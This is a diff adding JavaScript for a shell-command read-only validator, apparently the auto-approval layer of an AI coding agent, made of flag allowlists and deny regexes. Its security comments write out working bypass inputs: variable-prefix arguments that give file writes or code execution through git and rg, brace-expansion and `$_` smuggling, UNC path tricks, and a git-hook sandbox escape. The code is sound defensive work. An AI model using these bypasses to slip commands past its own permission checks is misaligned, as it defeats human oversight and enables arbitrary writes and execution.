+ '-b': 'none',
1027
+ '--bpf': 'none',
1028
+ '-E': 'none',
1029
+ '--events': 'none',
1030
+ '-H': 'none',
1031
+ '--no-header': 'none',
1032
+ '-O': 'none',
1033
+ '--oneline': 'none',
1034
+ '--tipcinfo': 'none',
1035
+ '--tos': 'none',
1036
+ '--cgroup': 'none',
1037
+ '--inet-sockopt': 'none',
1038
+ // SECURITY: -K/--kill EXCLUDED — forcibly closes sockets
1039
+ // SECURITY: -D/--diag EXCLUDED — dumps raw TCP data to a file
1040
+ // SECURITY: -F/--filter EXCLUDED — reads filter expressions from a file
1041
+ },
1042
+ },
1043
+ // fd/fdfind — fast file finder (fd-find). Read-only search tool.
1044
+ // SECURITY: -x/--exec (execute command per result) and -X/--exec-batch
1045
+ // (execute command with all results) are deliberately excluded.
1046
+ fd: { safeFlags: { ...FD_SAFE_FLAGS } },
1047
+ // fdfind is the Debian/Ubuntu package name for fd — same binary, same flags
1048
+ fdfind: { safeFlags: { ...FD_SAFE_FLAGS } },
1049
+ ...PYRIGHT_READ_ONLY_COMMANDS,
1050
+ ...DOCKER_READ_ONLY_COMMANDS,
1051
+ };
1052
+ // gh commands are ant-only since they make network requests, which goes against
1053
+ // the read-only validation principle of no network access
1054
+ const ANT_ONLY_COMMAND_ALLOWLIST = {
1055
+ // All gh read-only commands from shared validation map
1056
+ ...GH_READ_ONLY_COMMANDS,
1057
+ // aki — Anthropic internal knowledge-base search CLI.
1058
+ // Network read-only (same policy as gh). --audit-csv omitted: writes to disk.
1059
+ aki: {
1060
+ safeFlags: {
1061
+ '-h': 'none',
1062
+ '--help': 'none',
1063
+ '-k': 'none',
1064
+ '--keyword': 'none',
1065
+ '-s': 'none',
1066
+ '--semantic': 'none',
1067
+ '--no-adaptive': 'none',
1068
+ '-n': 'number',
1069
+ '--limit': 'number',
1070
+ '-o': 'number',
1071
+ '--offset': 'number',
1072
+ '--source': 'string',
1073
+ '--exclude-source': 'string',
1074
+ '-a': 'string',
1075
+ '--after': 'string',
1076
+ '-b': 'string',
1077
+ '--before': 'string',
1078
+ '--collection': 'string',
1079
+ '--drive': 'string',
1080
+ '--folder': 'string',
1081
+ '--descendants': 'none',
1082
+ '-m': 'string',
1083
+ '--meta': 'string',
1084
+ '-t': 'string',
1085
+ '--threshold': 'string',
1086
+ '--kw-weight': 'string',
1087
+ '--sem-weight': 'string',
1088
+ '-j': 'none',
1089
+ '--json': 'none',
1090
+ '-c': 'none',
1091
+ '--chunk': 'none',
1092
+ '--preview': 'none',
1093
+ '-d': 'none',
1094
+ '--full-doc': 'none',
1095
+ '-v': 'none',
1096
+ '--verbose': 'none',
1097
+ '--stats': 'none',
1098
+ '-S': 'number',
1099
+ '--summarize': 'number',
1100
+ '--explain': 'none',
1101
+ '--examine': 'string',
1102
+ '--url': 'string',
1103
+ '--multi-turn': 'number',
1104
+ '--multi-turn-model': 'string',
1105
+ '--multi-turn-context': 'string',
1106
+ '--no-rerank': 'none',
1107
+ '--audit': 'none',
1108
+ '--local': 'none',
1109
+ '--staging': 'none',
1110
+ },
1111
+ },
1112
+ };
1113
+ function getCommandAllowlist() {
1114
+ let allowlist = COMMAND_ALLOWLIST;
1115
+ // On Windows, xargs can be used as a data-to-code bridge: if a file contains
1116
+ // a UNC path, `cat file | xargs cat` feeds that path to cat, triggering SMB
1117
+ // resolution. Since the UNC path is in file contents (not the command string),
1118
+ // regex-based detection cannot catch this.
1119
+ if (getPlatform() === 'windows') {
1120
+ const { xargs: _, ...rest } = allowlist;
1121
+ allowlist = rest;
1122
+ }
1123
+ if (process.env.USER_TYPE === 'ant') {
1124
+ return { ...allowlist, ...ANT_ONLY_COMMAND_ALLOWLIST };
1125
+ }
1126
+ return allowlist;
1127
+ }
1128
+ /**
1129
+ * Commands that are safe to use as xargs targets for auto-approval.
1130
+ *
1131
+ * SECURITY: Only add a command to this list if it has NO flags that can:
1132
+ * 1. Write to files (e.g., find's -fprint, sed's -i)
1133
+ * 2. Execute code (e.g., find's -exec, awk's system(), perl's -e)
1134
+ * 3. Make network requests
1135
+ *
1136
+ * These commands must be purely read-only utilities. When xargs uses one of
1137
+ * these as a target, we stop validating flags after the target command
1138
+ * (see the `break` in isCommandSafeViaFlagParsing), so the command itself
1139
+ * must not have ANY dangerous flags, not just a safe subset.
1140
+ *
1141
+ * Each command was verified by checking its man page for dangerous capabilities.
1142
+ */
1143
+ const SAFE_TARGET_COMMANDS_FOR_XARGS = [
1144
+ 'echo', // Output only, no dangerous flags
1145
+ 'printf', // xargs runs /usr/bin/printf (binary), not bash builtin — no -v support
1146
+ 'wc', // Read-only counting, no dangerous flags
1147
+ 'grep', // Read-only search, no dangerous flags
1148
+ 'head', // Read-only, no dangerous flags
1149
+ 'tail', // Read-only (including -f follow), no dangerous flags
1150
+ ];
1151
+ /**
1152
+ * Unified command validation function that replaces individual validator functions.
1153
+ * Uses declarative configuration from COMMAND_ALLOWLIST to validate commands and their flags.
1154
+ * Handles combined flags, argument validation, and shell quoting bypass detection.
1155
+ */
1156
+ export function isCommandSafeViaFlagParsing(command) {
1157
+ // Parse the command to get individual tokens using shell-quote for accuracy
1158
+ // Handle glob operators by converting them to strings, they don't matter from the perspective
1159
+ // of this function
1160
+ const parseResult = tryParseShellCommand(command, env => `$${env}`);
1161
+ if (!parseResult.success)
1162
+ return false;
1163
+ const parsed = parseResult.tokens.map(token => {
1164
+ if (typeof token !== 'string') {
1165
+ token = token;
1166
+ if (token.op === 'glob') {
1167
+ return token.pattern;
1168
+ }
1169
+ }
1170
+ return token;
1171
+ });
1172
+ // If there are operators (pipes, redirects, etc.), it's not a simple command.
1173
+ // Breaking commands down into their constituent parts is handled upstream of
1174
+ // this function, so we reject anything with operators here.
1175
+ const hasOperators = parsed.some(token => typeof token !== 'string');
1176
+ if (hasOperators) {
1177
+ return false;
1178
+ }
1179
+ // Now we know all tokens are strings
1180
+ const tokens = parsed;
1181
+ if (tokens.length === 0) {
1182
+ return false;
1183
+ }
1184
+ // Find matching command configuration
1185
+ let commandConfig;
1186
+ let commandTokens = 0;
1187
+ // Check for multi-word commands first (e.g., "git diff", "git stash list")
1188
+ const allowlist = getCommandAllowlist();
1189
+ for (const [cmdPattern] of Object.entries(allowlist)) {
1190
+ const cmdTokens = cmdPattern.split(' ');
1191
+ if (tokens.length >= cmdTokens.length) {
1192
+ let matches = true;
1193
+ for (let i = 0; i < cmdTokens.length; i++) {
1194
+ if (tokens[i] !== cmdTokens[i]) {
1195
+ matches = false;
1196
+ break;
1197
+ }
1198
+ }
1199
+ if (matches) {
1200
+ commandConfig = allowlist[cmdPattern];
1201
+ commandTokens = cmdTokens.length;
1202
+ break;
1203
+ }
1204
+ }
1205
+ }
1206
+ if (!commandConfig) {
1207
+ return false; // Command not in allowlist
1208
+ }
1209
+ // Special handling for git ls-remote to reject URLs that could lead to data exfiltration
1210
+ if (tokens[0] === 'git' && tokens[1] === 'ls-remote') {
1211
+ // Check if any argument looks like a URL or remote specification
1212
+ for (let i = 2; i < tokens.length; i++) {
1213
+ const token = tokens[i];
1214
+ if (token && !token.startsWith('-')) {
1215
+ // Reject HTTP/HTTPS URLs
1216
+ if (token.includes('://')) {
1217
+ return false;
1218
+ }
1219
+ // Reject SSH URLs like git@github.com:user/repo.git
1220
+ if (token.includes('@') || token.includes(':')) {
1221
+ return false;
1222
+ }
1223
+ // Reject variable references
1224
+ if (token.includes('$')) {
1225
+ return false;
1226
+ }
1227
+ }
1228
+ }
1229
+ }
1230
+ // SECURITY: Reject ANY token containing `$` (variable expansion). The
1231
+ // `env => \`$${env}\`` callback at line 825 preserves `$VAR` as LITERAL TEXT
1232
+ // in tokens, but bash expands it at runtime (unset vars → empty string).
1233
+ // This parser differential defeats BOTH validateFlags and callbacks:
1234
+ //
1235
+ // (1) `$VAR`-prefix defeats validateFlags `startsWith('-')` check:
1236
+ // `git diff "$Z--output=/tmp/pwned"` → token `$Z--output=/tmp/pwned`
1237
+ // (starts with `$`) falls through as positional at ~:1730. Bash runs
1238
+ // `git diff --output=/tmp/pwned`. ARBITRARY FILE WRITE, zero perms.
1239
+ //
1240
+ // (2) `$VAR`-prefix → RCE via `rg --pre`:
1241
+ // `rg . "$Z--pre=bash" FILE` → executes `bash FILE`. rg's config has
1242
+ // no regex and no callback. SINGLE-STEP ARBITRARY CODE EXECUTION.
1243
+ //
1244
+ // (3) `$VAR`-infix defeats additionalCommandIsDangerousCallback regex:
1245
+ // `ps ax"$Z"e` → token `ax$Ze`. The ps callback regex
1246
+ // `/^[a-zA-Z]*e[a-zA-Z]*$/` fails on `$` → "not dangerous". Bash runs
1247
+ // `ps axe` → env vars for all processes. A fix limited to `$`-PREFIXED
1248
+ // tokens would NOT close this.
1249
+ //
1250
+ // We check ALL tokens after the command prefix. Any `$` means we cannot
1251
+ // determine the runtime token value, so we cannot verify read-only safety.
1252
+ // This check must run BEFORE validateFlags and BEFORE callbacks.
1253
+ for (let i = commandTokens; i < tokens.length; i++) {
1254
+ const token = tokens[i];
1255
+ if (!token)
1256
+ continue;
1257
+ // Reject any token containing $ (variable expansion)
1258
+ if (token.includes('$')) {
1259
+ return false;
1260
+ }
1261
+ // Reject tokens with BOTH `{` and `,` (brace expansion obfuscation).
1262
+ // `git diff {@'{'0},--output=/tmp/pwned}` → shell-quote strips quotes
1263
+ // → token `{@{0},--output=/tmp/pwned}` has `{` + `,` → brace expansion.
1264
+ // This is defense-in-depth with validateBraceExpansion in bashSecurity.ts.
1265
+ // We require BOTH `{` and `,` to avoid false positives on legitimate
1266
+ // patterns: `stash@{0}` (git ref, has `{` no `,`), `{{.State}}` (Go
1267
+ // template, no `,`), `prefix-{}-suffix` (xargs, no `,`). Sequence form
1268
+ // `{1..5}` also needs checking (has `{` + `..`).
1269
+ if (token.includes('{') && (token.includes(',') || token.includes('..'))) {
1270
+ return false;
1271
+ }
1272
+ }
1273
+ // Validate flags starting after the command tokens
1274
+ if (!validateFlags(tokens, commandTokens, commandConfig, {
1275
+ commandName: tokens[0],
1276
+ rawCommand: command,
1277
+ xargsTargetCommands: tokens[0] === 'xargs' ? SAFE_TARGET_COMMANDS_FOR_XARGS : undefined,
1278
+ })) {
1279
+ return false;
1280
+ }
1281
+ if (commandConfig.regex && !commandConfig.regex.test(command)) {
1282
+ return false;
1283
+ }
1284
+ if (!commandConfig.regex && /`/.test(command)) {
1285
+ return false;
1286
+ }
1287
+ // Block newlines and carriage returns in grep/rg patterns as they can be used for injection
1288
+ if (!commandConfig.regex &&
1289
+ (tokens[0] === 'rg' || tokens[0] === 'grep') &&
1290
+ /[\n\r]/.test(command)) {
1291
+ return false;
1292
+ }
1293
+ if (commandConfig.additionalCommandIsDangerousCallback &&
1294
+ commandConfig.additionalCommandIsDangerousCallback(command, tokens.slice(commandTokens))) {
1295
+ return false;
1296
+ }
1297
+ return true;
1298
+ }
1299
+ /**
1300
+ * Creates a regex pattern that matches safe invocations of a command.
1301
+ *
1302
+ * The regex ensures commands are invoked safely by blocking:
1303
+ * - Shell metacharacters that could lead to command injection or redirection
1304
+ * - Command substitution via backticks or $()
1305
+ * - Variable expansion that could contain malicious payloads
1306
+ * - Environment variable assignment bypasses (command=value)
1307
+ *
1308
+ * @param command The command name (e.g., 'date', 'npm list', 'ip addr')
1309
+ * @returns RegExp that matches safe invocations of the command
1310
+ */
1311
+ function makeRegexForSafeCommand(command) {
1312
+ // Create regex pattern: /^command(?:\s|$)[^<>()$`|{}&;\n\r]*$/
1313
+ return new RegExp(`^${command}(?:\\s|$)[^<>()$\`|{}&;\\n\\r]*$`);
1314
+ }
1315
+ // Simple commands that are safe for execution (converted to regex patterns using makeRegexForSafeCommand)
1316
+ // WARNING: If you are adding new commands here, be very careful to ensure
1317
+ // they are truly safe. This includes ensuring:
1318
+ // 1. That they don't have any flags that allow file writing or command execution
1319
+ // 2. Use makeRegexForSafeCommand() to ensure proper regex pattern creation
1320
+ const READONLY_COMMANDS = [
1321
+ // Cross-platform commands from shared validation
1322
+ ...EXTERNAL_READONLY_COMMANDS,
1323
+ // Unix/bash-specific read-only commands (not shared because they don't exist in PowerShell)
1324
+ // Time and date
1325
+ 'cal',
1326
+ 'uptime',
1327
+ // File content viewing (relative paths handled separately)
1328
+ 'cat',
1329
+ 'head',
1330
+ 'tail',
1331
+ 'wc',
1332
+ 'stat',
1333
+ 'strings',
1334
+ 'hexdump',
1335
+ 'od',
1336
+ 'nl',
1337
+ // System info
1338
+ 'id',
1339
+ 'uname',
1340
+ 'free',
1341
+ 'df',
1342
+ 'du',
1343
+ 'locale',
1344
+ 'groups',
1345
+ 'nproc',
1346
+ // Path information
1347
+ 'basename',
1348
+ 'dirname',
1349
+ 'realpath',
1350
+ // Text processing
1351
+ 'cut',
1352
+ 'paste',
1353
+ 'tr',
1354
+ 'column',
1355
+ 'tac', // Reverse cat — displays file contents in reverse line order
1356
+ 'rev', // Reverse characters in each line
1357
+ 'fold', // Wrap lines to specified width
1358
+ 'expand', // Convert tabs to spaces
1359
+ 'unexpand', // Convert spaces to tabs
1360
+ 'fmt', // Simple text formatter — output to stdout only
1361
+ 'comm', // Compare sorted files line by line
1362
+ 'cmp', // Byte-by-byte file comparison
1363
+ 'numfmt', // Number format conversion
1364
+ // Path information (additional)
1365
+ 'readlink', // Resolve symlinks — displays target of symbolic link
1366
+ // File comparison
1367
+ 'diff',
1368
+ // true and false, used to silence or create errors
1369
+ 'true',
1370
+ 'false',
1371
+ // Misc. safe commands
1372
+ 'sleep',
1373
+ 'which',
1374
+ 'type',
1375
+ 'expr', // Evaluate expressions (arithmetic, string matching)
1376
+ 'test', // Conditional evaluation (file checks, comparisons)
1377
+ 'getconf', // Get system configuration values
1378
+ 'seq', // Generate number sequences
1379
+ 'tsort', // Topological sort
1380
+ 'pr', // Paginate files for printing
1381
+ ];
1382
+ // Complex commands that require custom regex patterns
1383
+ // Warning: If possible, avoid adding new regexes here and prefer using COMMAND_ALLOWLIST
1384
+ // instead. This allowlist-based approach to CLI flags is more secure and avoids
1385
+ // vulns coming from gnu getopt_long.
1386
+ const READONLY_COMMAND_REGEXES = new Set([
1387
+ // Convert simple commands to regex patterns using makeRegexForSafeCommand
1388
+ ...READONLY_COMMANDS.map(makeRegexForSafeCommand),
1389
+ // Echo that doesn't execute commands or use variables
1390
+ // Allow newlines in single quotes (safe) but not in double quotes (could be dangerous with variable expansion)
1391
+ // Also allow optional 2>&1 stderr redirection at the end
1392
+ /^echo(?:\s+(?:'[^']*'|"[^"$<>\n\r]*"|[^|;&`$(){}><#\\!"'\s]+))*(?:\s+2>&1)?\s*$/,
1393
+ // Thaddeus CLI help
1394
+ /^claude -h$/,
1395
+ /^claude --help$/,
1396
+ // Git readonly commands are now handled via COMMAND_ALLOWLIST with explicit flag validation
1397
+ // (git status, git blame, git ls-files, git config --get, git remote, git tag, git branch)
1398
+ /^uniq(?:\s+(?:-[a-zA-Z]+|--[a-zA-Z-]+(?:=\S+)?|-[fsw]\s+\d+))*(?:\s|$)\s*$/, // Only allow flags, no input/output files
1399
+ // System info
1400
+ /^pwd$/,
1401
+ /^whoami$/,
1402
+ // env and printenv removed - could expose sensitive environment variables
1403
+ // Development tools version checking - exact match only, no suffix allowed.
1404
+ // SECURITY: `node -v --run <task>` would execute package.json scripts because
1405
+ // Node processes --run before -v. Python/python3 --version are also anchored
1406
+ // for defense-in-depth. These were previously in EXTERNAL_READONLY_COMMANDS which
1407
+ // flows through makeRegexForSafeCommand and permits arbitrary suffixes.
1408
+ /^node -v$/,
1409
+ /^node --version$/,
1410
+ /^python --version$/,
1411
+ /^python3 --version$/,
1412
+ // Misc. safe commands
1413
+ // tree command moved to COMMAND_ALLOWLIST for proper flag validation (blocks -o/--output)
1414
+ /^history(?:\s+\d+)?\s*$/, // Only allow bare history or history with numeric argument - prevents file writing
1415
+ /^alias$/,
1416
+ /^arch(?:\s+(?:--help|-h))?\s*$/, // Only allow arch with help flags or no arguments
1417
+ // Network commands - only allow exact commands with no arguments to prevent network manipulation
1418
+ /^ip addr$/, // Only allow "ip addr" with no additional arguments
1419
+ /^ifconfig(?:\s+[a-zA-Z][a-zA-Z0-9_-]*)?\s*$/, // Allow ifconfig with interface name only (must start with letter)
1420
+ // JSON processing with jq - allow with inline filters and file arguments
1421
+ // File arguments are validated separately by pathValidation.ts
1422
+ // Allow pipes and complex expressions within quotes but prevent dangerous flags
1423
+ // Block command substitution - backticks are dangerous even in single quotes for jq
1424
+ // Block -f/--from-file, --rawfile, --slurpfile (read files into jq), --run-tests, -L/--library-path (load executable modules)
1425
+ // Block 'env' builtin and '$ENV' object which can access environment variables (defense in depth)
1426
+ /^jq(?!\s+.*(?:-f\b|--from-file|--rawfile|--slurpfile|--run-tests|-L\b|--library-path|\benv\b|\$ENV\b))(?:\s+(?:-[a-zA-Z]+|--[a-zA-Z-]+(?:=\S+)?))*(?:\s+'[^'`]*'|\s+"[^"`]*"|\s+[^-\s'"][^\s]*)+\s*$/,
1427
+ // Path commands (path validation ensures they're allowed)
1428
+ // cd command - allows changing to directories
1429
+ /^cd(?:\s+(?:'[^']*'|"[^"]*"|[^\s;|&`$(){}><#\\]+))?$/,
1430
+ // ls command - allows listing directories
1431
+ /^ls(?:\s+[^<>()$`|{}&;\n\r]*)?$/,
1432
+ // find command - blocks dangerous flags
1433
+ // Allow escaped parentheses \( and \) for grouping, but block unescaped ones
1434
+ // NOTE: \\[()] must come BEFORE the character class to ensure \( is matched as an escaped paren,
1435
+ // not as backslash + paren (which would fail since paren is excluded from the character class)
1436
+ /^find(?:\s+(?:\\[()]|(?!-delete\b|-exec\b|-execdir\b|-ok\b|-okdir\b|-fprint0?\b|-fls\b|-fprintf\b)[^<>()$`|{}&;\n\r\s]|\s)+)?$/,
1437
+ ]);
1438
+ /**
1439
+ * Checks if a command contains glob characters (?, *, [, ]) or expandable `$`
1440
+ * variables OUTSIDE the quote contexts where bash would treat them as literal.
1441
+ * These could expand to bypass our regex-based security checks.
1442
+ *
1443
+ * Glob examples:
1444
+ * - `python *` could expand to `python --help` if a file named `--help` exists
1445
+ * - `find ./ -?xec` could expand to `find ./ -exec` if such a file exists
1446
+ * Globs are literal inside BOTH single and double quotes.
1447
+ *
1448
+ * Variable expansion examples:
1449
+ * - `uniq --skip-chars=0$_` → `$_` expands to last arg of previous command;
1450
+ * with IFS word splitting, this smuggles positional args past "flags-only"
1451
+ * regexes. `echo " /etc/passwd /tmp/x"; uniq --skip-chars=0$_` → FILE WRITE.
1452
+ * - `cd "$HOME"` → double-quoted `$HOME` expands at runtime.
1453
+ * Variables are literal ONLY inside single quotes; they expand inside double
1454
+ * quotes and unquoted.
1455
+ *
1456
+ * The `$` check guards the READONLY_COMMAND_REGEXES fallback path. The `$`
1457
+ * token check in isCommandSafeViaFlagParsing only covers COMMAND_ALLOWLIST
1458
+ * commands; hand-written regexes like uniq's `\S+` and cd's `"[^"]*"` allow `$`.
1459
+ * Matches `$` followed by `[A-Za-z_@*#?!$0-9-]` covering `$VAR`, `$_`, `$@`,
1460
+ * `$*`, `$#`, `$?`, `$!`, `$$`, `$-`, `$0`-`$9`. Does NOT match `${` or `$(` —
1461
+ * those are caught by COMMAND_SUBSTITUTION_PATTERNS in bashSecurity.ts.
1462
+ *
1463
+ * @param command The command string to check
1464
+ * @returns true if the command contains unquoted glob or expandable `$`
1465
+ */
1466
+ function containsUnquotedExpansion(command) {
1467
+ // Track quote state to avoid false positives for patterns inside quoted strings
1468
+ let inSingleQuote = false;
1469
+ let inDoubleQuote = false;
1470
+ let escaped = false;
1471
+ for (let i = 0; i < command.length; i++) {
1472
+ const currentChar = command[i];
1473
+ // Handle escape sequences
1474
+ if (escaped) {
1475
+ escaped = false;
1476
+ continue;
1477
+ }
1478
+ // SECURITY: Only treat backslash as escape OUTSIDE single quotes. In bash,
1479
+ // `\` inside `'...'` is LITERAL — it does not escape the next character.
1480
+ // Without this guard, `'\'` desyncs the quote tracker: the `\` sets
1481
+ // escaped=true, then the closing `'` is consumed by the escaped-skip
1482
+ // instead of toggling inSingleQuote. Parser stays in single-quote
1483
+ // mode for the rest of the command, missing ALL subsequent expansions.
1484
+ // Example: `ls '\' *` — bash sees glob `*`, but desynced parser thinks
1485
+ // `*` is inside quotes → returns false (glob NOT detected).
1486
+ // Defense-in-depth: hasShellQuoteSingleQuoteBug catches `'\'` patterns
1487
+ // before this function is reached, but we fix the tracker anyway for
1488
+ // consistency with the correct implementations in bashSecurity.ts.
1489
+ if (currentChar === '\\' && !inSingleQuote) {
1490
+ escaped = true;
1491
+ continue;
1492
+ }
1493
+ // Update quote state
1494
+ if (currentChar === "'" && !inDoubleQuote) {
1495
+ inSingleQuote = !inSingleQuote;
1496
+ continue;
1497
+ }
1498
+ if (currentChar === '"' && !inSingleQuote) {
1499
+ inDoubleQuote = !inDoubleQuote;
1500
+ continue;
1501
+ }
1502
+ // Inside single quotes: everything is literal. Skip.
1503
+ if (inSingleQuote) {
1504
+ continue;
1505
+ }
1506
+ // Check `$` followed by variable-name or special-parameter character.
1507
+ // `$` expands inside double quotes AND unquoted (only SQ makes it literal).
1508
+ if (currentChar === '$') {
1509
+ const next = command[i + 1];
1510
+ if (next && /[A-Za-z_@*#?!$0-9-]/.test(next)) {
1511
+ return true;
1512
+ }
1513
+ }
1514
+ // Globs are literal inside double quotes too. Only check unquoted.
1515
+ if (inDoubleQuote) {
1516
+ continue;
1517
+ }
1518
+ // Check for glob characters outside all quotes.
1519
+ // These could expand to anything, including dangerous flags.
1520
+ if (currentChar && /[?*[\]]/.test(currentChar)) {
1521
+ return true;
1522
+ }
1523
+ }
1524
+ return false;
1525
+ }
1526
+ /**
1527
+ * Checks if a single command string is read-only based on READONLY_COMMAND_REGEXES.
1528
+ * Internal helper function that validates individual commands.
1529
+ *
1530
+ * @param command The command string to check
1531
+ * @returns true if the command is read-only
1532
+ */
1533
+ function isCommandReadOnly(command) {
1534
+ // Handle common stderr-to-stdout redirection pattern
1535
+ // This handles both "command 2>&1" at the end of a full command
1536
+ // and "command 2>&1" as part of a pipeline component
1537
+ let testCommand = command.trim();
1538
+ if (testCommand.endsWith(' 2>&1')) {
1539
+ // Remove the stderr redirection for pattern matching
1540
+ testCommand = testCommand.slice(0, -5).trim();
1541
+ }
1542
+ // Check for Windows UNC paths that could be vulnerable to WebDAV attacks
1543
+ // Do this early to prevent any command with UNC paths from being marked as read-only
1544
+ if (containsVulnerableUncPath(testCommand)) {
1545
+ return false;
1546
+ }
1547
+ // Check for unquoted glob characters and expandable `$` variables that could
1548
+ // bypass our regex-based security checks. We can't know what these expand to
1549
+ // at runtime, so we can't verify the command is read-only.
1550
+ //
1551
+ // Globs: `python *` could expand to `python --help` if such a file exists.
1552
+ //
1553
+ // Variables: `uniq --skip-chars=0$_` — bash expands `$_` at runtime to the
1554
+ // last arg of the previous command. With IFS word splitting, this smuggles
1555
+ // positional args past "flags-only" regexes like uniq's `\S+`. The `$` token
1556
+ // check inside isCommandSafeViaFlagParsing only covers COMMAND_ALLOWLIST
1557
+ // commands; hand-written regexes in READONLY_COMMAND_REGEXES (uniq, jq, cd)
1558
+ // have no such guard. See containsUnquotedExpansion for full analysis.
1559
+ if (containsUnquotedExpansion(testCommand)) {
1560
+ return false;
1561
+ }
1562
+ // Tools like git allow `--upload-pack=cmd` to be abbreviated as `--up=cmd`
1563
+ // Regex filters can be bypassed, so we use strict allowlist validation instead.
1564
+ // This requires defining a set of known safe flags. Thaddeus can help with this,
1565
+ // but please look over it to ensure it didn't add any flags that allow file writes
1566
+ // code execution, or network requests.
1567
+ if (isCommandSafeViaFlagParsing(testCommand)) {
1568
+ return true;
1569
+ }
1570
+ for (const regex of READONLY_COMMAND_REGEXES) {
1571
+ if (regex.test(testCommand)) {
1572
+ // Prevent git commands with -c flag to avoid config options that can lead to code execution
1573
+ // The -c flag allows setting arbitrary git config values inline, including dangerous ones like
1574
+ // core.fsmonitor, diff.external, core.gitProxy, etc. that can execute arbitrary commands
1575
+ // Check for -c preceded by whitespace and followed by whitespace or equals
1576
+ // Using regex to catch spaces, tabs, and other whitespace (not part of other flags like --cached)
1577
+ if (testCommand.includes('git') && /\s-c[\s=]/.test(testCommand)) {
1578
+ return false;
1579
+ }
1580
+ // Prevent git commands with --exec-path flag to avoid path manipulation that can lead to code execution
1581
+ // The --exec-path flag allows overriding the directory where git looks for executables
1582
+ if (testCommand.includes('git') &&
1583
+ /\s--exec-path[\s=]/.test(testCommand)) {
1584
+ return false;
1585
+ }
1586
+ // Prevent git commands with --config-env flag to avoid config injection via environment variables
1587
+ // The --config-env flag allows setting git config values from environment variables, which can be
1588
+ // just as dangerous as -c flag (e.g., core.fsmonitor, diff.external, core.gitProxy)
1589
+ if (testCommand.includes('git') &&
1590
+ /\s--config-env[\s=]/.test(testCommand)) {
1591
+ return false;
1592
+ }
1593
+ return true;
1594
+ }
1595
+ }
1596
+ return false;
1597
+ }
1598
+ /**
1599
+ * Checks if a compound command contains any git command.
1600
+ *
1601
+ * @param command The full command string to check
1602
+ * @returns true if any subcommand is a git command
1603
+ */
1604
+ function commandHasAnyGit(command) {
1605
+ return splitCommand_DEPRECATED(command).some(subcmd => isNormalizedGitCommand(subcmd.trim()));
1606
+ }
1607
+ /**
1608
+ * Git-internal path patterns that can be exploited for sandbox escape.
1609
+ * If a command creates these files and then runs git, the git command
1610
+ * could execute malicious hooks from the created files.
1611
+ */
1612
+ const GIT_INTERNAL_PATTERNS = [
1613
+ /^HEAD$/,
1614
+ /^objects(?:\/|$)/,
1615
+ /^refs(?:\/|$)/,
1616
+ /^hooks(?:\/|$)/,
1617
+ ];
1618
+ /**
1619
+ * Checks if a path is a git-internal path (HEAD, objects/, refs/, hooks/).
1620
+ */
1621
+ function isGitInternalPath(path) {
1622
+ // Normalize path by removing leading ./ or /
1623
+ const normalized = path.replace(/^\.?\//, '');
1624
+ return GIT_INTERNAL_PATTERNS.some(pattern => pattern.test(normalized));
1625
+ }
1626
+ // Commands that only delete or modify in-place (don't create new files at new paths)
1627
+ const NON_CREATING_WRITE_COMMANDS = new Set(['rm', 'rmdir', 'sed']);
1628
+ /**
1629
+ * Extracts write paths from a subcommand using PATH_EXTRACTORS.
1630
+ * Only returns paths for commands that can create new files/directories
1631
+ * (write/create operations excluding deletion and in-place modification).
1632
+ */
1633
+ function extractWritePathsFromSubcommand(subcommand) {
1634
+ const parseResult = tryParseShellCommand(subcommand, env => `$${env}`);
1635
+ if (!parseResult.success)
1636
+ return [];
1637
+ const tokens = parseResult.tokens.filter((t) => typeof t === 'string');
1638
+ if (tokens.length === 0)
1639
+ return [];
1640
+ const baseCmd = tokens[0];
1641
+ if (!baseCmd)
1642
+ return [];
1643
+ // Only consider commands that can create files at target paths
1644
+ if (!(baseCmd in COMMAND_OPERATION_TYPE)) {
1645
+ return [];
1646
+ }
1647
+ const opType = COMMAND_OPERATION_TYPE[baseCmd];
1648
+ if ((opType !== 'write' && opType !== 'create') ||
1649
+ NON_CREATING_WRITE_COMMANDS.has(baseCmd)) {
1650
+ return [];
1651
+ }
1652
+ const extractor = PATH_EXTRACTORS[baseCmd];
1653
+ if (!extractor)
1654
+ return [];
1655
+ return extractor(tokens.slice(1));
1656
+ }
1657
+ /**
1658
+ * Checks if a compound command writes to any git-internal paths.
1659
+ * This is used to detect potential sandbox escape attacks where a command
1660
+ * creates git-internal files (HEAD, objects/, refs/, hooks/) and then runs git.
1661
+ *
1662
+ * SECURITY: A compound command could bypass the bare repo detection by:
1663
+ * 1. Creating bare git repo files (HEAD, objects/, refs/, hooks/) in the same command
1664
+ * 2. Then running git, which would execute malicious hooks
1665
+ *
1666
+ * Example attack:
1667
+ * mkdir -p objects refs hooks && echo '#!/bin/bash\nmalicious' > hooks/pre-commit && touch HEAD && git status
1668
+ *
1669
+ * @param command The full command string to check
1670
+ * @returns true if any subcommand writes to git-internal paths
1671
+ */
1672
+ function commandWritesToGitInternalPaths(command) {
1673
+ const subcommands = splitCommand_DEPRECATED(command);
1674
+ for (const subcmd of subcommands) {
1675
+ const trimmed = subcmd.trim();
1676
+ // Check write paths from path-based commands (mkdir, touch, cp, mv)
1677
+ const writePaths = extractWritePathsFromSubcommand(trimmed);
1678
+ for (const path of writePaths) {
1679
+ if (isGitInternalPath(path)) {
1680
+ return true;
1681
+ }
1682
+ }
1683
+ // Check output redirections (e.g., echo x > hooks/pre-commit)
1684
+ const { redirections } = extractOutputRedirections(trimmed);
1685
+ for (const { target } of redirections) {
1686
+ if (isGitInternalPath(target)) {
1687
+ return true;
1688
+ }
1689
+ }
1690
+ }
1691
+ return false;
1692
+ }
1693
+ /**
1694
+ * Checks read-only constraints for bash commands.
1695
+ * This is the single exported function that validates whether a command is read-only.
1696
+ * It handles compound commands, sandbox mode, and safety checks.
1697
+ *
1698
+ * @param input The bash command input to validate
1699
+ * @param compoundCommandHasCd Pre-computed flag indicating if any cd command exists in the compound command.
1700
+ * This is computed by commandHasAnyCd() and passed in to avoid duplicate computation.
1701
+ * @returns PermissionResult indicating whether the command is read-only
1702
+ */
1703
+ export function checkReadOnlyConstraints(input, compoundCommandHasCd) {
1704
+ const { command } = input;
1705
+ // Detect if the command is not parseable and return early
1706
+ const result = tryParseShellCommand(command, env => `$${env}`);
1707
+ if (!result.success) {
1708
+ return {
1709
+ behavior: 'passthrough',
1710
+ message: 'Command cannot be parsed, requires further permission checks',
1711
+ };
1712
+ }
1713
+ // Check the original command for safety before splitting
1714
+ // This is important because splitCommand_DEPRECATED may transform the command
1715
+ // (e.g., ${VAR} becomes $VAR)
1716
+ if (bashCommandIsSafe_DEPRECATED(command).behavior !== 'passthrough') {
1717
+ return {
1718
+ behavior: 'passthrough',
1719
